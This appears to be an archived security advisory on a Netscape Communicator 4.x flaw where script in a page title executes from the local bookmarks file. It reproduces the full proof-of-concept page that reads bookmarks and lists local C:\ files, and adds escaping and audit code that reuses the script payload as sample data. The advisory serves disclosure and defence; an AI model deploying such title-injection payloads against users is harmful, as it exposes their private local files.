COMMAND

    Netscape (javascript)

SYSTEMS AFFECTED

    Netscape Communicator 4.x

PROBLEM

    Georgi Guninski found the following.  There is a security bug in
    Netscape Communicator 4.51 Win95, 4.07 Linux (presumably all 4.x
    versions are affected) in the way they handle special bookmarks
    with JavaScript code in the title.  If you enclose JavaScript
    code in <SCRIPT> tags inside the <TITLE> tag and bookmark that
    page, the JavaScript code is written to the local bookmarks file.
    Then, when the bookmarks file is opened, the JavaScript code is
    executed in the security context of a local file - the bookmarks
    file.  The bookmarks file may be opened by a script, probably by a
    server redirect, or by the user.  The bookmarks file name must be
    known, but it is easily guessed for most dialup users.
    Vulnerabilities are: reading the user's bookmarks, browsing local
    directories, reading local files (works fine on Linux, probably
    possible on Windows).  A demonstration is available at:

        http://www.nat.bg/~joro/book2.html

    Source follows:

    <HTML><HEAD>
    <TITLE>
    <SCRIPT>
    alert('Bookmarks got control');


    s='Here are some bookmarks: \n';
    for(i=1;i<7;i++)
     s += document.links[i]+'\n';
    alert(s);

    dirToRead='wysiwyg://2/file://c:/';
    a=window.open(dirToRead);
    s='Here are some files in C:\\ :\n';
    for(i=1;i<7;i++)
     s += a.document.links[i]+'\n';
    a.close();
    alert(s);

    </SCRIPT>
    </TITLE></HEAD>
    <BODY>
    <hr WIDTH="100%">
    <br>To test it:
    <br>1) Bookmark this page.
    <br>2) Close all NC windows and restart NC.
    <br>3) Open bookmarks file (change the filename in the field below if needed
    and click "Open bookmarks", or use File| Open Page... )
    <br>
    <hr WIDTH="100%">

    <FORM>
    Enter the file name of your bookmarks file:
    <INPUT TYPE=TEXT SIZE=70 VALUE='c:\Program Files\Netscape\Users\default\bookmark.htm'>
    </FORM>

    <SCRIPT>
    function openBookmarks() {

    /* bmFile='c:\\Program Files\\Netscape\\Users\\default\\bookmark.htm'; */
     a=window.open('wysiwyg://1/file:///'+document.forms[0].elements[0].value);
    }
    </SCRIPT>

    <A HREF="javascript:openBookmarks()">Open bookmarks</A>
    </BODY>
    <hr WIDTH="100%">
    <A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>
    </HTML>

SOLUTION

    Disable JavaScript or do not bookmark untrusted pages.
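
    The root cause above is that the page title is copied verbatim into
    the local bookmarks file.  The following is an added example, not
    code from the advisory or from Netscape: it shows the unescaped
    write next to an escaped one, plus an audit of an existing bookmarks
    file for titles that still carry markup.  The function names, the
    simplified <DT><A HREF="...">title</A> entry layout and the sample
    data are assumptions made for illustration.

```javascript
// Added example (not Netscape's code). The bookmark line layout is the
// simplified <DT><A HREF="...">title</A> form; sample inputs are constructed.

// Encode the characters that let a page title break out of text context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern described in the advisory: title copied verbatim.
function bookmarkLineUnsafe(url, title) {
  return '<DT><A HREF="' + url + '">' + title + '</A>';
}

// Hardened form: title and URL are encoded before being written.
function bookmarkLineSafe(url, title) {
  return '<DT><A HREF="' + escapeHtml(url) + '">' + escapeHtml(title) + '</A>';
}

// Audit: return the 1-based line numbers of bookmark entries whose
// title text still contains a tag after the opening <A ...>.
function findActiveTitles(bookmarkFileText) {
  const hits = [];
  bookmarkFileText.split(/\r?\n/).forEach((line, idx) => {
    const m = /<DT>\s*<A\b[^>]*>(.*)<\/A>/i.exec(line);
    if (m && /<\s*\/?\s*[a-z!]/i.test(m[1])) hits.push(idx + 1);
  });
  return hits;
}

// Constructed sample: one benign title, one title carrying a script element.
const sampleUrl = 'http://example.test/page.html';
const hostileTitle = "<SCRIPT>alert('Bookmarks got control');</SCRIPT>";
const unsafeFile = [
  '<DL><p>',
  bookmarkLineUnsafe('http://example.test/', 'Plain title'),
  bookmarkLineUnsafe(sampleUrl, hostileTitle),
  '</DL><p>',
].join('\n');
const safeFile = unsafeFile.replace(
  bookmarkLineUnsafe(sampleUrl, hostileTitle),
  bookmarkLineSafe(sampleUrl, hostileTitle));

console.log(findActiveTitles(unsafeFile)); // flagged entry line numbers
console.log(findActiveTitles(safeFile));   // nothing flagged after encoding
```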